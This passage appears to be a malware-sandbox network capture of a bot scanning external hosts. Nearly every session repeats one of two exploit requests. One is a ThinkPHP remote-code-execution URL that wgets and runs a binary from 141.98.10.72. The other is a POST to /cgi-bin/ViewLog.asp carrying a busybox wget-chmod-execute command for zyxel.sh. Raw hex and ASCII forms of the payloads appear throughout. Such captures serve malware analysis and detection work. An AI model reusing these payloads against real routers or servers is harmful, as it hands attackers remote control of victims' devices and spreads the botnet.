                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      31192.168.2.155788695.79.128.16580
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:28:56.086123943 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:28:56.341994047 CET516INHTTP/1.0 400 Bad Request
                                                      Content-Type: text/html
                                                      Content-Length: 349
                                                      Connection: close
                                                      Date: Tue, 24 Jul 2001 14:25:56 GMT
                                                      Server: lighttpd/1.4.32
                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      32192.168.2.153507895.221.199.10880
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:28:56.286077023 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:28:56.532382011 CET317INHTTP/1.1 400 Bad Request
                                                      Server: Web server
                                                      Date: Wed, 14 Feb 2024 08:28:41 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 155
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>Web server</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      33192.168.2.155719895.35.40.9080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:28:56.307430029 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      34192.168.2.154036831.136.204.2358080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:28:57.032988071 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:00.186964989 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:06.330887079 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:18.362451077 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:43.961838961 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:33.112390995 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      35192.168.2.155836231.131.88.248080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:28:57.058625937 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      36192.168.2.155122894.121.209.1838080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:28:57.072876930 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      37192.168.2.153871694.120.212.2188080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:28:57.076791048 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      38192.168.2.154288831.171.154.1148080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:28:57.306459904 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:28:57.529320002 CET405INHTTP/1.1 400 Bad Request
                                                      Server: nginx
                                                      Date: Wed, 14 Feb 2024 08:28:57 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 248
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 54 68 65 20 70 6c 61 69 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 77 61 73 20 73 65 6e 74 20 74 6f 20 48 54 54 50 53 20 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 63 65 6e 74 65 72 3e 54 68 65 20 70 6c 61 69 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 77 61 73 20 73 65 6e 74 20 74 6f 20 48 54 54 50 53 20 70 6f 72 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 The plain HTTP request was sent to HTTPS port</title></head><body><center><h1>400 Bad Request</h1></center><center>The plain HTTP request was sent to HTTPS port</center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      39192.168.2.154484694.123.38.548080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:28:57.330943108 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      40192.168.2.155129894.120.58.698080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:28:57.332884073 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      41192.168.2.154986431.220.18.38080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:28:57.413862944 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      42192.168.2.154959095.86.93.2098080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:28:57.561548948 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      43192.168.2.155562495.100.53.4980
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:28:57.744321108 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:28:57.954298019 CET480INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 258
                                                      Expires: Wed, 14 Feb 2024 08:28:57 GMT
                                                      Date: Wed, 14 Feb 2024 08:28:57 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 64 66 39 30 61 31 37 26 23 34 36 3b 31 37 30 37 38 39 39 33 33 37 26 23 34 36 3b 31 62 38 62 33 37 34 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;3df90a17&#46;1707899337&#46;1b8b374d</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      44192.168.2.154871031.136.173.2408080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:28:58.255105019 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:01.466959953 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:07.610800982 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:19.642568111 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:43.961915970 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:33.112401962 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      45192.168.2.156096831.136.156.838080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:28:59.691554070 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:00.314960003 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
